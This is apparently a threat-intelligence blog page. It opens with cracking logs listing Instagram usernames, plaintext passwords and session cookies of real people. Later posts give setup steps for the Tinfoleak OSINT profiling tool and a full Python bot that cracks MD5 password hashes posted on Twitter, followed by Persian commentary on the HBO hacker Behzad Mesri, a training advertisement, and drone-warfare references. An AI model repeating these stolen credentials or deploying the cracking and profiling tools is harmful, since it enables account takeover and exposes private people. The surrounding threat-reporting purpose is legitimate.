https://md_peyman_:amir1380@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [authenticated”: true] – Source Length: 53 – Found data to capture: Followers: 153, Following: 40, Posts: 3, Is_Private: false, Orginal: false @hacracker||NVTBZPXLVZNTVOYKBCKG|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 153, Following: 40, Posts: 3, Is_Private: false, Orginal: false @hacracker|urlgen=”{\”time\”: 1511596710\054 \”94.102.54.95\”: 29073}:1eIVM6:HHX06aqY1uzYAw7jBcZkU399VwY”; ds_user_id=6327901837; Max-Age=7776000; csrftoken=eUMpIA9bhmrOg7UpIYu3DrLe16znmxvI; rur=FRC; sessionid=IGSC4a82a6b1ea7a31303c3262db10bb1725e4bc0fc664905ec23ca7c5dbd3d44493%3ARToYvA8P8osVSe5fMw8CygXRNiovgVV7%3A%7B%22_auth_user_id%22%3A6327901837%2C%22_auth_user_backend%22%3A%22accounts.backends.CaseInsensitiveModelBackend%22%2C%22_auth_user_hash%22%3A%22%22%2C%22_platform%22%3A4%2C%22_token_ver%22%3A2%2C%22_token%22%3A%226327901837%3Au1CQ4MU9Kbz0xPKFKHyJnkWK8gf4M2H2%3Abd83c854c07b2a4bd8d7f5b07553571d6c3a4c802a5b95c25d721e84124eaa10%22%2C%22last_refreshed%22%3A1511596708.7151811123%7D; target=””; mid=WhkipAALAAGQDOk5YauCtBMlEBoA; ig_vw=1024; ig_pr=1|||1511567887|0||3||||
https://mahsa.70.70.70:amir1380@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [authenticated”: true] – Source Length: 53 – Found data to capture: Followers: 30, Following: 17, Posts: 4, Is_Private: false, Orginal: false @hacracker||STBYFDNGBEHFIHDBKDAS|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 30, Following: 17, Posts: 4, Is_Private: false, Orginal: false @hacracker|urlgen=”{\”time\”: 1511596850\054 \”94.102.54.95\”: 29073}:1eIVOM:mMN4PMtojZqy5QqvW6Ld2IdbfX4″; ds_user_id=6308474199; Max-Age=7776000; csrftoken=zbOjpxShHyuW8ammDGL9xHsVUPIdKoUP; rur=ATN; sessionid=IGSC2460f015a03398fbf80ac87e71638fe284970fa8c5cdaaec056c9ea93c5bb843%3AlQIkaYInFjFHOpqOgCglyfnd9ThT3Z3z%3A%7B%22_auth_user_id%22%3A6308474199%2C%22_auth_user_backend%22%3A%22accounts.backends.CaseInsensitiveModelBackend%22%2C%22_auth_user_hash%22%3A%22%22%2C%22_platform%22%3A4%2C%22_token_ver%22%3A2%2C%22_token%22%3A%226308474199%3AMn0xrYNhsWr7GiXoa1NgkWoyvRof7WtU%3A5169bb3bb3f67c97864bdc40c3a3248725fe5b118ddf5dc926a384356348e357%22%2C%22last_refreshed%22%3A1511596850.4464466572%7D; target=””; mid=WhkjMQALAAGQzaLx5Ma8mgAYUtpi; ig_vw=1024; ig_pr=1|||1511568027|0||3||||
https://_amir.rain:amir1380@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [checkpoint_required] – Source Length: 122 – Found data to capture: Followers: 560, Following: 970, Posts: 19, Is_Private: false, Orginal: false @hacracker||FCUNFQPOWTLMMCWMVEOX|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 560, Following: 970, Posts: 19, Is_Private: false, Orginal: false @hacracker|urlgen=”{\”time\”: 1511597060\054 \”94.102.54.95\”: 29073}:1eIVRk:TZA3YRuKxGCCIBLWISg_HqqaOzk”; csrftoken=74AoeMN6n8wSL7hsd62bVaohbdnfnlwS; Max-Age=31449600; rur=FRC; mid=WhkkAwALAAEF74MMls9Arof8N1YZ; ig_vw=1024; ig_pr=1|||1511568237|0||3||||
https://davoodi3134:amir1380@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [checkpoint_required] – Source Length: 122 – Found data to capture: Followers: 231, Following: 302, Posts: 12, Is_Private: true, Orginal: false @hacracker||WNQGZYDUKEKEPAAWZTBE|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 231, Following: 302, Posts: 12, Is_Private: true, Orginal: false @hacracker|urlgen=”{\”time\”: 1511597307\054 \”94.102.54.95\”: 29073}:1eIVVk:QGlFBE_UR8bsO7Gll-mAfzxxRPo”; csrftoken=sQRcZ3agob5xAV8IkwGypQcvn2ZLYGi5; Max-Age=31449600; rur=FRC; mid=Whkk-wALAAHbjqYRxgb7unmv1B4M; ig_vw=1024; ig_pr=1|||1511568484|0||3||||
https://khanoom_heidarzadeh:ordibehesht@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [checkpoint_required] – Source Length: 122 – Found data to capture: Followers: 219, Following: 350, Posts: 36, Is_Private: false, Orginal: false @hacracker||ZMETDGUOFMHGDYTJVGKC|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 219, Following: 350, Posts: 36, Is_Private: false, Orginal: false @hacracker|urlgen=”{\”time\”: 1511600873\054 \”94.102.54.95\”: 29073}:1eIWRG:ME9wLHWH2BMkjKlZCcvpwZSk4GE”; csrftoken=poEwcwoOibPbUjuwYpBnnXFWvTuXET4z; Max-Age=31449600; rur=FRC; mid=Whky6AALAAFcaDElsXAcklYpW2xF; ig_vw=1024; ig_pr=1|||1511572051|0||3||||
https://abd_1266:ordibehesht@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [checkpoint_required] – Source Length: 122 – Found data to capture: Followers: 20, Following: 43, Posts: 0, Is_Private: true, Orginal: false @hacracker||FXGETYPZQIJIRZJSBRAL|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 20, Following: 43, Posts: 0, Is_Private: true, Orginal: false @hacracker|urlgen=”{\”time\”: 1511600949\054 \”94.102.54.95\”: 29073}:1eIWSU:gQu945UQk37HXSCnqKiYDQuweKM”; csrftoken=6MTDOVB9iQDTYuFkxNTVuoHjHbYu1obv; Max-Age=31449600; rur=FRC; mid=WhkzNAALAAFN2unptZ_dOAGk-eOJ; ig_vw=1024; ig_pr=1|||1511572126|0||3||||
https://soodabehshalikaran:khordad@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [checkpoint_required] – Source Length: 122 – Found data to capture: Followers: 173, Following: 342, Posts: 16, Is_Private: true, Orginal: false @hacracker||FACWSLAPINDOTSBZXAOW|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 173, Following: 342, Posts: 16, Is_Private: true, Orginal: false @hacracker|urlgen=”{\”time\”: 1511605043\054 \”94.102.54.95\”: 29073}:1eIXWW:orRoSrjiq9bWf0N2xcjcvgAu6nY”; csrftoken=SzOaG6yFMxcQQNZm6hpiBydOLFPLH5I7; Max-Age=31449600; rur=FRC; mid=WhlDMgALAAH5Hcg4MStpKSmDQ_22; ig_vw=1024; ig_pr=1|||1511576220|0||3||||

Featured post

More Twitter action from Iran

***OSINT-Twitter-Tinfoleak***
Go to https://apps.twitter.com/ > Register & Login > Create new app >
Go to (Keys and Access Tokens) > Copy (CONSUMER_KEY & CONSUMER_SECRET) >
Go to (Create my access token)
> Copy (ACCESS_TOKEN & ACCESS_TOKEN_SECRET)
Open terminal
1.pip install tweepy
2.pip install
–upgrade exifread
3.pip install oauth2
4.pip install jinja2
5.apt install python-pyexiv2
-y
6.wget https://www.isecauditors.com/sites/default/isecauditors.com/files/files/tinfoleak-2.1-
SHA2017_Edition.zip
7.unzip tinfoleak-2.1-SHA2017_Edition.zip
8.cd tinfoleak-2.1-SHA2017_Edition
&& chmod +x *
9.leafpad tinfoleak.conf
Edit

CONSUMER_KEY =
CONSUMER_SECRET =
ACCESS_TOKEN =

ACCESS_TOKEN_SECRET =

Added

CONSUMER_KEY = (PASTE CONSUMER_KEY)
CONSUMER_SECRET =
(PASTE CONSUMER_SECRET)
ACCESS_TOKEN = (PASTE ACCESS_TOKEN)
ACCESS_TOKEN_SECRET =
(PASTE ACCESS_TOKEN_SECRET)

Save & Close
10.python tinfoleak.py -n (Username) -g
nicholasstoller.kml -o output.log
***OSINT-Twitter-Tinfoleak***

Featured post

Twitter Brute Force – Iranian hack

Iranian password cracking for twitter – within the last 72 hours

 

#!/usr/bin/env python

###################################

# Password cracking twitter V 1.0 #

# #

# : # # #

###################################

import os

import time

import twitter

import json

import random

from datetime import datetime

from hashlookup.LookupTable import LookupTable

CONSUMER_KEY = “”

CONSUMER_SECRET = “”

ACCESS_TOKEN_KEY = “”

ACCESS_TOKEN_SECRET = “”

POLL = 60

WORDLIST = ‘./crackstation-dist/crackstation.txt’

W = “\033[0m” # default/white

R = “\033[31m” # red

P = “\033[35m” # purple

C = “\033[36m” # cyan

bold = “\033[1m”

INFO = bold + C + “[*] ” + W

WARN = bold + R + “[!] ” + W

MONEY = bold + P + “[$] ” + W

TIME = lambda: str(datetime.now()).split(‘ ‘)[1].split(‘.’)[0]

print INFO+”%s: Logging into Twitter API …” % TIME()

api = twitter.Api(consumer_key=CONSUMER_KEY, consumer_secret=CONSUMER_SECRET, access_token_key=ACCESS_TOKEN_KEY, access_token_secret=ACCESS_TOKEN_SECRET)

indexes = {

‘md5’: ‘./crackstation-dist/crackstation-md5.idx’,

}

if os.path.exists(‘processed.pkl’):

with open(‘processed.pkl’, ‘r’) as fp:

processed = json.loads(fp.read())

print INFO+”%s: Loaded %d processed IDs” % (TIME(), len(processed))

else:

processed = []

def crack_hashes(algorithm, hashes):

results = []

if 0 < len(hashes):

lookup_table = LookupTable(

algorithm=algorithm,

index_file=indexes[algorithm],

wordlist_file=WORDLIST,

)

results = lookup_table[hashes]

return results

def process_request(mention):

hashes = filter(lambda word: len(word) == 32, mention.text.split(‘ ‘))

if len(hashes):

print INFO+”%s: Canidate hashes: %s” % (TIME(), hashes)

results = crack_hashes(‘md5’, hashes[0]) # Limit one hash atm

if results[hashes[0]] is not None:

message = “@%s I cracked your hash, the password is ‘%s'” % (

mention.user.screen_name, results[hashes[0]]

)

else:

message = “Sorry @%s but I couldn’t crack that hash :(” % mention.user.screen_name

else:

print WARN+”%s: No hashes found in request.” % TIME()

message = None

if message:

print INFO + “%s: Posting update \”%s\”” % (TIME(), message)

message += ” (%d)” % random.randint(0, 9999)

api.PostUpdate(message)

def poll_twitter():

mentions = filter(lambda m: m.id not in processed, api.GetMentions())

print INFO + “%s: %d new mention(s) to process” % (TIME(), len(mentions))

for mention in mentions:

process_request(mention)

processed.append(int(mention.id))

def run_forever():

while True:

time.sleep(POLL)

print INFO + “%s: Polling twitter API …” % TIME()

try:

poll_twitter()

except twitter.TwitterError as error:

print WARN+”%s: Error from API %s, sleeping for 5mins” % (TIME(), str(error))

if __name__ == ‘__main__’:

try:

run_forever()

except KeyboardInterrupt:

with open(‘processed.pkl’, ‘wb’) as fp:

fp.write(“%s” % json.dumps(processed))

print INFO+”%s: Saved processed to processed.pkl” % TIME()

 

und3rgr0und

Featured post

Behzad Mesri – #HBO Hack – Silent Terror

البته سوال اصلی من از همون اول که این دیفیسر رو میشناختم
این بود که چرا اسمش یه o کم داره
skote vahshat – 

BehzadMasri – skote_vahshat Get the scoop here (PDF)

بهزاد مصری

فکر کنم اول اشتباه نوشته و همون معروف شده و توی رو در بایستی مونده

Wired Article
حالا امیدوارم که زندگیش خراب نشه، ولی کاش مقامات به این سوال هم پاسخ میدادن

TBH2

این لاگ ها و پیست ها و دیتابیس هایی که توی فروم های زیرزمینی تبادل میشن رو احتمالن دیدید
هیچ امنیت و پرایوسی ای باقی نمونده و قطعن یکی از مشتریان اینها، یا حتا عامل لیک شدنشون خود سازمان های دولتی و امنیتی هستند
چندان عجیب نیست که یک نفر به این شکل مشخصاتش لو میره…
یعنی واقعن هم خیلی کار سختی نیست، با یه سیستم شخصی هم میشه مشابهش رو انجام داد، دیگه دولت که خیلی دستش بازتره

bm3

اونی که مرتکب یک جرم سایبری بزرگ میشه و لو نمیره یا لو میره ولی پیدا نمیشه خیلی کارش درسته…
واقعن کار سختیه… یعنی دائم باید از دید اونی که می خواد پیداش بکنه به موضوع نگاه بکنه و این از کاری که مرتکبش میشه هم مهم تر و شاید سخت تره

سکات وشات

TBH

ا📌 طلاعات تکمیلی در مورد بهزاد مصری و هک HBO

🔹 کشف حمله سایبری زمانی که Time Warner کمپانی پدر HBO در حال خریده شدن توسط AT&T به مبلغ ۸۵ میلیارد دلار بوده است، اتفاق افتاد. این کشف سهام اچ بی او را کاهش داد.

‼️ مصری ظاهرا نمایشنامه قسمت های ساخته نشده سریال های اچ بی او را نیز سرقت کرده است.

🔹 از سوابق مصرف هک کردن زیرساخت‌های انرژی اتمی اسرائیل می باشد.

🔹۷ اتهام مصری شامل «جرایم رایانه‌ای»، «جرایم مالی»، «اخاذی»، «سرقت هویت» و دیگر جرایم است. باور مقامات آمریکایی این است که وی در حال حاضر در ایران سکونت دارد.

🔹 متن ایمیلی که مصری به هک شدگان فرستاده شامل عبارت زیر بوده است:

“Hi to All losers! Yes it’s true! HBO is hacked!”

BM

🔹 مصری با نام مستعار Skote Vahshat حداقل ده اکسپلویت از نوع SQL Injection ثبت کرده، و ده ها سایت را دیفیس کرده است.

🔹 بر اساس ادعای مصری، وی بیش از ۱.۵ ترابایت داده به سرقت برده است.

🔴 گروه هکری OurMine کنترل حساب توییتر HBO را در شهریور ماه گرفتند. به نظر میرسد رمز این حساب توسط مصری به آنها منتقل شده است.

🔴 یکی از دلایل متهم شدن سریع مصری، تلاش وی برای تماس با خبرنگاران و رسانه های متعدد جهت تحت فشار گذاشتن اچ بی او برای پرداخت مبلغ اخاذی بوده است.

🔹 اولین اقدام مصری یافتن دسترسی از راه دور کارکنان به شبکه اچ بی او بوده که بتواند از همان طریق دسترسی خود به زیرساخت را حفظ نماید.

Featured post

2018 Cyber Intelligence – Cyber CounterIntelligence Training HOLIDAY2018 Discounts available through December 8

Why Treadstone 71:

January 8-12 Cyber Intelligence- Amsterdam, NL
February 5-9 Cyber Intelligence- Reston, VA
March 19-23 Cyber Intelligence- Columbia, Maryland
April 9-13 Cyber Intelligence- London, UK
April 30 – May 3 Cyber Intelligence – Los Angeles California
May 14-18 Cyber Intelligence- San Jose, CA
June 18-22 Cyber Intelligence- Annapolis Junction, Maryland
Aug 13-17 Cyber Intelligence- Reston, VA
Sep 17-21 – Cyber Intelligence- Boston, MA
Oct 15-19 Cyber Counter Intelligence – Reston, VA
Nov 5-9 Cyber Intelligence- Denver, CO
Dec 3-7 Cyber Counter Intelligence – Columbia, Maryland

ENTER HOLIDAY2018 during registration as a Coupon Code for Black Friday Discounts of Lowest Price Ever!! 2460Euro 2200GBP 2900USD Price – Available for 15 days. (Offer ends December 8 – Limited Seats available at this price)

– T71 has been teaching this course going for 9 years building a common body of knowledge ( and capability maturity model for cyber intel )

– We follow intelligence community standards such as those taught at the Sherman Kent School

– All courses include case studies taken directly from today’s adversarial campaigns

– All intelligence community standards are applied to cyber threat intelligence

– T71 teaches both public and private courses

– T71 also has supported multiple companies from the US, AU, and EU build their cyber threat intelligence strategies, hiring, and programs

– T71 has assisted multiple companies to select and implement threat intelligence platforms

– We apply what we have learned in our client engagements

(Benefits list – Take the course)

– Your instructor is not cemented in forensics – we are intel

– T71 is active in adversary platform performing targeted research that uses and validates the methods taught in the classroom

– Students attending T71 classes not only absorb classroom instruction, but they serve a 1-week apprenticeship using the concepts, TTPs, and methods taught in the class in hands-on case studies

– T71 courses result in 40 CPEs and an industry-validated certification providing the foundational aspects to execute cyber intelligence collection and analysis while preparing for the next phase of cyber threat intelligence operations

– You know it is the right thing to do since no one else is solely focused on applied teaching methods where the student walks away feeling a certain level of skill and accomplishment.

– Although contrary to course licensing and legal requirements, many ‘threat intel and research intel’ commercial firms are using the Treadstone 71 course content and methodology in their programs, services, and even in their threat intelligence platforms

T712018Training

See T71 Intel Training to Register for early discounts

Featured post

Zapad Exercises – 2nd/3rd Order Effects

 

The recent Russian Zapad wargaming exercises included a plethora of electronic capabilities demonstration and potentially more. Russia is known to recently been involved in illegal immigration efforts in Sweden, Finland, and Norway along with hostile intent along its northern borders (Estonia, Latvia, Lithuania) including cell/communication tower tampering. Could the recent Zapad exercises be more than just wargaming?

Some What If thoughts on these non-linear actions:

– Testing capabilities, distance, strength, impacts
– Testing responses like a stone in pond
    – 2nd and 3rd order effects were measured to determine the impact on targets, targets responses, etc.
    – Russians had people in each target country assisting with target impacts
    – Russians monitored target government communications from within each country
    – Determine length of time for target government to respond and what methods were used and where to get communications back online (if at all) – the locations of the response represent capabilities unknown to Russia until such an exercise is performed
– Other possibles:
     – A cover for illegal activities that occurred during the exercise – a feint, a ruse
 – Testing a precursor to actual execution – that is why military exercises are performed
 – What capabilities are being left in the exercise areas; what is not being removed after the exercise using the exercise as a ruse to place assets close to Western borders that were not there before
 What do you think?
 https://uawire.org/news/media-belarusian-and-russian-militaries-are-jamming-mobile-communications-along-border-with-poland

Featured post

Drone Wars! Threats, Vulnerabilities and Hostile Use

Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_01Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_02Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_03Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_04Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_05Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_06Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_07Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_08Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_09Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_10Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_11Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_12Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_13Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_14Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_15Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_16Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_17Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_18Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_19Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_20Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_21Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_22Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_23Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_24Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_25Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_26Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_27Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_28Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_29Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_30Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_31Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_32Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_33Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_34Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_35Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_36Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_37Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_38Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_39Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_40Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_41Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_42Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_43Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_44Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_45Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_46Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_47Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_48Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_49Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_50Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_51Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_52Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_53Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_54Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_55

References

Adamy, D. (2001) EW 101 A First Course in Electronic Warfare, Boston: Artech House.

Adamy, D. (2004) EW 102 A Second Course in Electronic Warfare, Boston: Artech House.

Adamy, D. (2009) EW 103 Tactical Battlefield Communications Electronic Warfare, Boston: Artech House.

Adamy, D. (2015) EW 104 EW against a New Generation of Threats, Boston: Artech House.

Anonymous, (2017) GPS/SBAS Signal Generator, GSS4100, Spirent Communications Data Sheet. Satellite AIS, Exact Earth, Ltd.

Anonymous, (9/8/2017) Innovation: Simulating GPS Signals, GPS World, http://gpsworld.com/simulating-gps-signals/

Anonymous, (8/22/2017) Nationwide Automatic Identification System, www.navgen.uscg.gov

Anonymous, (8/22/2017) Long Range Identification and Tracking (LRIT) Overview, www.navgen.uscg.gov

Anonymous, (8/22/2017) How AIS Works, www.navgen.uscg.gov

Anonymous, (2015) Satellite AIS, Exact Earth, Ltd.

Anonymous, (6/21/2015) Cyber Threats against the Aviation Industry, in SCADA on April8, 2014, INFOSEC Institute.

Anonymous, (2012) A Guide for Testers of GPS Devices and Systems, spectracom, Test & Measurement technical Note, TN15-101A – What You Want to know about GPS.

Anonymous, (5/14/2012) what is a GPS Simulator? Spectracom, Test & Measurement White Paper, WP08-101A.

Anonymous, (1/10/2014) GPS Signal Plan, Navipedia, http://www.navipedia.net/index.php/GPS_Signal_Plan

Anonymous, (4/2017) Counter-Unmanned Aircraft System Techniques, HQ, Department of the Army, ATP-3-01.81, https://fas.org/irp/doddir/army/atp3-01-81.pdf

Atayero, A.A, Luka, .K. & Alatishe, A.A (8/2011) Satellite Link Design: A Tutorial, International Journal of Electrical & Computer Sciences, IJECS-IJEND Vol: 11 No: 04.

Balduzzi, M., Wilhoit, K., & Pasta, A. (2014) A Security Evaluation of AIS, Trend Micro Forward-Looking Threat Research

Barker, B.C Capt., et.al. (2006) Overview of the GPS M-Code Signal, MITRE Report.

Bay-Yen, J. (2000) Chapter 5: GPS C/A Code Signal Structure, Fundamentals of Global Positioning System Receivers: A Software Approach, New York: John Wiley, http://read.pudn.com/downloads85/ebook/326017/Fundamentals%20of%20Global%20Positioning%20System%20Receivers/booktext05.pdf

Bhatti, J. & Humphreys, T. E. (2016) Hostile Control of Ships via False GPS Signals Demonstration and Detection, Navigation: Journal of the Institute of Navigation, Vol. 64, No.1, Spring 2017.

Buesne, G & DeSanto, D. (2017) GNSS Receivers and the Cyber-Threat: Lessons from the Information Security Community, Spirent Communications, Baltimore, MD

Buesne, G & Holbrow, M. (6/29/2017) GNSS Threats, Attacks and Simulations, Spirent: PNT Advisory Board, Baltimore, MD

Bussert, J.C. (10/2013) China Expands Influence through Electronics, Signal Magazine, https://www.afcea.org/content/china-expands-influence-through-electronics

Chachak, E. (retrieved 9/1/2017) U.S. Naval Mishaps – Human Error or Cyber Malfeasance? CyberDB.https://www.cyberdb.co/u-s-naval-mishaps-human-error-or-cyber-malfeasance/

Crosby, J. (12/16/2017) here’s What USNS Bowditch Does, Inverse Innovation, https://www.inverse.com/article/25346-usns-bowditch-underwater-drone-stolen-china

Demchak, C., Patton, K, T. & Tangredi, S.J. (8/25/2017) why are our Ships Crashing? Competence, Overload, and Cyber Considerations, Center for International Maritime Security. https://www.realcleardefense.com/articles/2017/08/25/why_are_our_ships_crashing_competence_overload_and_cyber_considerations_112152.html

Dupont, G. (2017) SIEM Fundamentals for your Threat Intelligence Program, Recorded Future, https://www.recordedfuture.com/security-operations-center-fundamentals/

Easton, R.D. & Frazier, E.F. (2013) GPS Declassified: From Smart Bombs to Smartphones, University of Nebraska Press.

FCC Wireless Telecommunications Bureau, Marine VHF Radio Channels, per 47 CFR 80.371© and 80.373(f)

Fessenden, F. & Watkins, D. (6/18/2017) the Path of the Container Ship that Struck a U.S. Destroyer, NYT. https://www.nytimes.com/interactive/2017/06/18/world/asia/path-ship-hit-uss-fitzgerald.html?mcubz=3

Gaertner, U (2013) UAV Swarm Tactics: An Agent-Based Simulation and Markov Process Analysis, Naval Postgraduate School Thesis.

Haider, Z. & Khalid, S. (8/2016) Survey on Effective GPS Spoofing Countermeasures, 6th International Conference on Innovative Computing Technology (INTECH 2016), https://www.researchgate.net/publication/313543601_Survey_on_effective_GPS_spoofing_countermeasures

Heath, T. (5/7/2015) How to Hack a Military Drone Parts I & II, Technology-Hackers, www.cybersecurityintelligence.com/blog/

Hodge, H. (8/23/2017) why are Navy Ships colliding in the Pacific? Experts Weigh In, Military.com

Homeland Security (2017) Improving the Operation and Development of Global Positioning System (GPS) Equipment Used by Critical Infrastructure, NCIC/NCC Unclassified report.

Hurley, M. (9/2017) Beyond the Iron Triad: The Future of Airborne C2ISR, Arlington, VA: Mitchell Institute for Aerospace Studies.

Humphreys, T.E, e. al. (1/1/2009) assessing the Spoofing Threat: Development of a Portable Civilian GPS Spoofer, https://gps.mae.cornell.edu/humphreys_etal_iongnss2008.pdf, Cornell University

Humphreys, T.E, (7/18/2012) Statement on the Vulnerability of Civil Unmanned Aerial Vehicles and Other Systems to Civil GPS Spoofing, Submitted to the Subcommittee on Oversight., Investigations, and Management of the House Committee on Homeland Security.

Kao, Lee, Chang, and Ko. (2007) A Fuzzy Logic Method for Collision Avoidance in Vessel Traffic Service, Journal of Navigation, 60, 17-31.

John, E.N & Schrage, D.P (2017) System Integration and Operation of a Research Unmanned Aerial Vehicle, Atlanta GA: School of Aerospace Engineering, Georgia Institute of Technology.

LaGrone, S. (8/21/2017) Chain of Events Involving U.S Navy Warships in the Western Pacific Raise Readiness, Training Questions, USNI News

LaGrone, S. (1/31/2017) Cruiser USS Antietam Runs Aground in Tokyo Bay, Spills Oil, USNI News.

Mccaslin, I.B. (2017) Red Drones Over Disputed Seas: A Field Guide to Chinese UAVs/UCAVs Operating in the disputed East and South China Seas. Project 2049 Institute.  http://project2049.net/documents/Red%20Drones%20Over%20Disputed%20Seas_PLA_Project2049.pdf

News Correspondent, (8/22/2017) USS McCain crash is 4th Navy Accident in Pacific this Year, The Washington Post, AP.

News Correspondent, (8/31/2017) DDG 51 Arleigh Burke Class Destroyer, Military.com

News Correspondent, (8/21/2017) CNO Orders Operational Pause, Review After Latest Ship Collision, Military.com

News Correspondent, (8/21/2017) 10 Sailors Missing, 5 injured after Destroyer Collides with Tanker, Military.com

News Correspondent, (8/22/2017) Remains of Navy Sailors found on USS John S McCain, Military.com

News Correspondent, (8/17/2017) Navy Fires Commander, XO from USS Fitzgerald for Fatal Collision, Military.com

News Correspondent, (7/21/2017) Investigation Faults Navy in Fitzgerald Collision Report, Military.com

News Correspondent, (6/20/2017) Stories of Fitzgerald Sailors Killed in Destroyer – Container Ship Crash, Military.com

News Correspondent, (6/16/2017) US Navy Destroyer Collides with Japanese Merchant Ship, Military.com

News Correspondent, (5/09/2017) US Navy Ship Collides with South Korean Fishing Boat, Military.com

News Correspondent, (1/31/2017) Oil Spill in Tokyo Bay After Navy Cruiser Runs Aground, Military.com

Nichols, R.K (8/31/2017) Stand By for a whole slew of military short articles on the Navy Collisions (my students only), Private memo to COT799 & CMST 455.

Nichols, R.K. & Lekkas, P.L. (2002) Wireless Security: Threats, Models, Solutions, New York, McGraw Hill.

O’Donnell, W. (2017) Interview with Navy Captain. http://inmilitary.com/real-reason-us-navy-keeps-hitting-merchant-vessels/

Ranganathan, A, et.al, SPREE A Spoofing Resistant GPS Receiver, Department of Computer Science, ETH Zurich, Switzerland, Zurich Information Security and Privacy Center.

Richardson, J. Adm., (8/31/2017) No Evidence of Hacking in McCain and Fitzgerald Collisions, Military.com

Rudow, l. (2014) Where to Mount a Radome for best Performance, Boat US, http://www.boatus.com/magazine/2014/june/mounting-a-radome.asp

Schallhorn, K., (9/1/2017) US Military crashes, collisions in the Pacific, FoxNews. http://www.foxnews.com/us/2017/08/28/us-military-crashes-collisions-in-pacific.html

